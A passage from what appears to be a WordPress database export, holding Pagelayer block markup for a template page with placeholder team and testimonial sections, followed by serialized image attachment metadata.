{\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"zfw5404\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"luy2737\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003ch6u003eAmazing Staffu003c/h6u003e\",\"pagelayer-id\":\"37b6520\"} --><h6>Amazing Staff</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"u003ch5u003eMeet Our Teamu003c/h2u003e\",\"pagelayer-id\":\"px01593\"} --><h5>Meet Our Team</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",60,,,,,Solid,,,,\",\"text\":\"u003ch2u003eOur Teamu003c/h2u003e\",\"pagelayer-id\":\"gph1628\"} --><h2>Our Team</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"u003cp style=u0022text-align: centeru0022u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. u003cbr /u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.u003cbr /u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.u003c/pu003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"jet7983\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_margin\":\"0em,0em,0em,0em\",\"pagelayer-id\":\"ona7297\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"600\",\"pagelayer-id\":\"a8f4660\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"Susan Day\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{nmargin-top: -55px;n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"u003ch5u003eManageru003c/h5u003enu003cpu003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.u003c/pu003e\",\"pagelayer-id\":\"fcz4396\"} --><h5>Manager</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{ntop: 58px !important;nposition: relative;n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"egf1310\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https://facebook.com/sitepad\",\"pagelayer-id\":\"caz4725\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https://twitter.com/sitepad\",\"pagelayer-id\":\"ese8910\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https://plus.google.com/sitepad\",\"pagelayer-id\":\"3so7116\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https://linkedin.com/sitepad\",\"pagelayer-id\":\"oxp4246\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"700\",\"pagelayer-id\":\"nul8057\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"James Duncan\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{nmargin-top: -55px;n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"u003ch5u003eLeaderu003c/h5u003enu003cpu003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.u003c/pu003e\",\"pagelayer-id\":\"db55026\"} --><h5>Leader</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{ntop: 58px !important;nposition: relative;n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"mny1495\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https://facebook.com/sitepad\",\"pagelayer-id\":\"5xn7585\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https://twitter.com/sitepad\",\"pagelayer-id\":\"gyf6039\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https://plus.google.com/sitepad\",\"pagelayer-id\":\"kur7407\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https://linkedin.com/sitepad\",\"pagelayer-id\":\"uh89652\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"700\",\"pagelayer-id\":\"opd4644\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"Lori Harvey\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{nmargin-top: -55px;n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"u003ch5u003eSupervisoru003c/h5u003enu003cpu003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.u003c/pu003e\",\"pagelayer-id\":\"l8u8105\"} --><h5>Supervisor</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{ntop: 58px !important;nposition: relative;n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"idy6377\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https://facebook.com/sitepad\",\"pagelayer-id\":\"ou47819\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https://twitter.com/sitepad\",\"pagelayer-id\":\"o669787\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https://plus.google.com/sitepad\",\"pagelayer-id\":\"8pc7951\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https://linkedin.com/sitepad\",\"pagelayer-id\":\"h7g1675\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"800\",\"pagelayer-id\":\"cw23874\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"Ralph Fields\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{nmargin-top: -55px;n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"u003ch5u003eFounderu003c/h5u003enu003cpu003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.u003c/pu003e\",\"pagelayer-id\":\"zck4605\"} --><h5>Founder</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{ntop: 58px !important;nposition: relative;n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"ht86316\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https://facebook.com/sitepad\",\"pagelayer-id\":\"ojf2660\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https://twitter.com/sitepad\",\"pagelayer-id\":\"j5p8986\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https://plus.google.com/sitepad\",\"pagelayer-id\":\"m0q2052\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https://linkedin.com/sitepad\",\"pagelayer-id\":\"0vq2271\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,4em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"sjm4980\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"7tl6661\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"u003ch5u003eTestimonialu003c/h5u003e\",\"color\":\"\",\"pagelayer-id\":\"vjw1728\"} --><h5>Testimonial</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",50,,,,,Solid,,,,\",\"heading_typo_tablet\":\",65,,,,,Solid,,,,\",\"text\":\"u003ch2u003eTestimonialu003c/h2u003e\",\"pagelayer-id\":\"6od9463\"} --><h2>Testimonial</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"u003cp style=u0022text-align: centeru0022u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. u003cbr /u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.u003cbr /u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.u003c/pu003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"3yh5533\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_testimonial_slider {\"slide_items\":\"3\",\"slide_margin\":\"10\",\"arrows_bg\":\"#6a6969\",\"arraow_color\":\"#ffffff\",\"arraow_bg_size\":\"20\",\"arraow_bg_shape\":\"20\",\"ele_bg_hover_delay\":\"400\",\"ele_css\":\"{{element}} .pagelayer-testimonial-content{nbox-shadow: 0 2px 5px #eee;npadding: 20px;n}\",\"slide_controls\":\"pager\",\"animation\":\"\",\"pagelayer-id\":\"vi93287\"} -->\n<!-- wp:pagelayer/pl_testimonial {\"image_position\":\"aside-position\",\"alignment\":\"center\",\"author-spacing\":\"22\",\"avatar\":\"9\",\"testimonial_image_size\":\"100\",\"img_shape\":\"square\",\"cite\":\"John Smith\",\"cite_color\":\"#141718ff\",\"cite_style\":\",18,,600,,,Solid,,,,\",\"designation\":\"Traveler\",\"designation_color\":\"#eeaa6dff\",\"cite_designation_style\":\",16,,500,,,Solid,,,,\",\"ele_bg_hover_delay\":\"400\",\"testimonial_border_type\":\"double\",\"testimonial_border_color\":\"#eeaa6dff\",\"testimonial_border_width\":\"10,10,10,10\",\"cite_spacing\":\"0,0,0,20\",\"quote_content\":\"u003cp style=u0022font-size: 14pxu0022u003eLorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.u003c/pu003e\",\"pagelayer-id\":\"6nf2452\"} --><p style=\"font-size: 14px\">Lorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.</p><!-- /wp:pagelayer/pl_testimonial -->\n<!-- wp:pagelayer/pl_testimonial {\"image_position\":\"aside-position\",\"alignment\":\"center\",\"author-spacing\":\"22\",\"avatar\":\"9\",\"testimonial_image_size\":\"100\",\"img_shape\":\"square\",\"cite\":\"Daisy Shah\",\"cite_color\":\"#141718ff\",\"cite_style\":\",18,,600,,,Solid,,,,\",\"designation\":\"Traveler\",\"designation_color\":\"#eeaa6dff\",\"cite_designation_style\":\",16,,500,,,Solid,,,,\",\"ele_bg_hover_delay\":\"400\",\"testimonial_border_type\":\"double\",\"testimonial_border_color\":\"#eeaa6dff\",\"testimonial_border_width\":\"10,10,10,10\",\"cite_spacing\":\"0,0,0,20\",\"quote_content\":\"u003cp style=u0022font-size: 14pxu0022u003eLorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.u003c/pu003e\",\"pagelayer-id\":\"2545962\"} --><p style=\"font-size: 14px\">Lorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.</p><!-- /wp:pagelayer/pl_testimonial -->\n<!-- wp:pagelayer/pl_testimonial {\"image_position\":\"aside-position\",\"alignment\":\"center\",\"author-spacing\":\"22\",\"avatar\":\"9\",\"testimonial_image_size\":\"100\",\"img_shape\":\"square\",\"cite\":\"Simon Toufel\",\"cite_color\":\"#141718ff\",\"cite_style\":\",18,,600,,,Solid,,,,\",\"designation\":\"Traveler\",\"designation_color\":\"#eeaa6dff\",\"cite_designation_style\":\",16,,500,,,Solid,,,,\",\"ele_bg_hover_delay\":\"400\",\"testimonial_border_type\":\"double\",\"testimonial_border_color\":\"#eeaa6dff\",\"testimonial_border_width\":\"10,10,10,10\",\"cite_spacing\":\"0,0,0,20\",\"quote_content\":\"u003cp style=u0022font-size: 14pxu0022u003eLorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.u003c/pu003e\",\"pagelayer-id\":\"rz69247\"} --><p style=\"font-size: 14px\">Lorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.</p><!-- /wp:pagelayer/pl_testimonial -->\n<!-- wp:pagelayer/pl_testimonial {\"image_position\":\"aside-position\",\"alignment\":\"center\",\"author-spacing\":\"22\",\"avatar\":\"9\",\"testimonial_image_size\":\"100\",\"img_shape\":\"square\",\"cite\":\"John Smith\",\"cite_color\":\"#141718ff\",\"cite_style\":\",18,,600,,,Solid,,,,\",\"designation\":\"Web Developer\",\"designation_color\":\"#eeaa6dff\",\"cite_designation_style\":\",16,,500,,,Solid,,,,\",\"ele_bg_hover_delay\":\"400\",\"testimonial_border_type\":\"double\",\"testimonial_border_color\":\"#eeaa6dff\",\"testimonial_border_width\":\"10,10,10,10\",\"cite_spacing\":\"0,0,0,20\",\"quote_content\":\"u003cp style=u0022font-size: 14pxu0022u003eLorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.u003c/pu003e\",\"pagelayer-id\":\"8fm3851\"} --><p style=\"font-size: 14px\">Lorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.</p><!-- /wp:pagelayer/pl_testimonial -->\n<!-- /wp:pagelayer/pl_testimonial_slider -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->'),(243,67,'_wp_attached_file','2021/05/holistic-healer-21.png'),(244,67,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:287;s:6:\"height\";i:285;s:4:\"file\";s:30:\"2021/05/holistic-healer-21.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"holistic-healer-21-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-21-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:31:\"holistic-healer-21-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-21-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-21-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:30:\"holistic-healer-21-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:32:\"holistic-healer-21-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(245,68,'_wp_attached_file','2021/05/holistic-healer-icon-3.png'),(246,68,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:56;s:6:\"height\";i:96;s:4:\"file\";s:34:\"2021/05/holistic-healer-icon-3.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-3-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:35:\"holistic-healer-icon-3-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-3-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-3-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-3-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:36:\"holistic-healer-icon-3-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";